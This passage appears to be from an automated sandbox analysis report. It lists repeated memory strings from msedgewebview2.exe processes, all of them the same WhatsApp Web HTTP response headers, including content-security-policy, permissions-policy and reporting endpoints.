https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 23:36:04 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2395462368.00001B4400613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 23:36:04 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2395462368.00001B4400613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 23:36:04 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2395003417.00001B4400434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 23:36:04 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2395003417.00001B4400434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 23:36:04 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2393461202.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 02:17:55 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2393461202.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 02:17:55 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2393549936.00001B440043C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 02:17:55 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2393549936.00001B440043C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 02:17:55 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2393549936.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 02:17:55 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
